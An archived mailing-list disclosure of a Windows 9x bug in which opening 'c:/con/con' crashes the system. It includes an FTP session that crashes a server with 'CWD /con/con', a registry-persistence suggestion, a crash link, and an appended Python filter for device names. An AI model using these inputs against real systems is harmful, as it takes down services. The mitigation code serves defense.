-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ----------------------------------------------------------------------
- ----

New exploit found by the securax crew on 3/3/error

for: windoze 98, maybe 95 too... not for NT4 or win2K

When we looked at the new exploit for IE that uses the image c:/con/con
(http://www.zoomnet.net/~quick/error/crash.html)
we experimented a bit with that nonexistent path.

We found that any program in Windows 98 will crash if you try to open that file.
eg: try Start --> Run --> c:/con/con
or open in Word the non-existing document c:/con/con
Both attempts will result in a Blue Screen of Death and a lockup.

This can also be exploited to crash remote servers.
Look what we tried on this servU-FTP v 2.4a
(works on any windoze 98 FTP, even with an anonymous or guest account)

It looked something like this:

230 user logged in, proceed
SYST
215 UNIX TYPE:L8
connect ok!
PWD
257 "c:/home" is current directory.
haal directory op
TYPE A
200 Type set to A.
PORT xx.xx.xx.xx :-)
200 PORT Command succesful
LIST
150 Opening ASCII mode data connect
Download: 86 bytes
Wacht op de server
226 transfer complete
CDUP
250 directory changed to /c:/
PWD
250 "/c:/" is current directory
CWD /con/con --> this does the trick
... no more response :-) server crashed.

This is probably just the beginning of a new series of exploits for windoze.
This little flaw could easily be used in a macro virus.
Maybe even be placed in the registry:

HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open c:\con\con "%1" %*

Da G#Df@RTER & Pathos (securax)
www.securax.org

- ----------------------------------------------------------------------
- ----

This is a really old thing (good but old). We found it like 1 year ago with
the nul/nul (now it is con/con), and we found others, but all with the same
error: overflow over Explorer.exe and VFat, Windows 95 and Windows 98.

To anyone who wants to crash Windows 9x, click: here >file://c:\nul\nul<

u n d e r g r o u n d   s e c u r i t y   s y s t e m s   r e s e a r c h
http://www.ussrback.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBOMPvBNybEYfHhkiVEQKedQCfYYyh2G1TOaE5HdtXo0eNc+/K2lgAoIkt
U+6L5I9uSGENV3KFuyKQ8xqu
=vwMM
-----END PGP SIGNATURE-----
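
The server-side mitigation for the FTP case above is to refuse any pathname whose components resolve to a DOS device before it reaches the filesystem. The following is an added example, not code from the original posts or from any FTP server; it goes beyond the con/con and nul/nul cases in the messages to the full set of reserved device names, and `device_components`, `screen_ftp_line` and the 550 reply text are hypothetical names chosen for illustration.

```python
import re

# DOS device names that exist in every directory on Windows 9x. The page
# names only CON and NUL; the rest of this list is added for the example.
RESERVED = ({"CON", "PRN", "AUX", "NUL", "CLOCK$"}
            | {f"COM{i}" for i in range(1, 10)}
            | {f"LPT{i}" for i in range(1, 10)})

# FTP verbs whose argument is a pathname (RFC 959).
PATH_VERBS = {"CWD", "RETR", "STOR", "APPE", "LIST", "NLST",
              "MKD", "RMD", "DELE", "RNFR", "RNTO"}


def device_components(path):
    """Return the components of `path` that resolve to a DOS device."""
    hits = []
    for part in re.split(r"[\\/]+", path):
        name = part
        # Drop a drive prefix glued to the component, e.g. "c:con".
        if len(name) >= 2 and name[0].isalpha() and name[1] == ":":
            name = name[2:]
        # Windows ignores an extension and trailing dots, spaces or a
        # colon, so "NUL.txt", "con." and "CON:" all name the device.
        base = name.split(".", 1)[0].rstrip(" :").upper()
        if base in RESERVED:
            hits.append(part)
    return hits


def screen_ftp_line(line):
    """Return a 550 reply if the command must be refused, else None."""
    verb, _, arg = line.strip().partition(" ")
    if verb.upper() in PATH_VERBS and device_components(arg):
        return "550 Requested action not taken: reserved device name."
    return None


if __name__ == "__main__":
    # Constructed input modelled on the client commands in the session above.
    for cmd in ["PWD", "CDUP", "CWD /home", "CWD /con/con"]:
        print(f"{cmd!r:18} -> {screen_ftp_line(cmd) or 'pass to handler'}")
```

The same `device_components` check applies to any other input that ends up in a file-open call on Windows 9x, such as URLs or document paths handed to a local application.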
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:39:02 PDT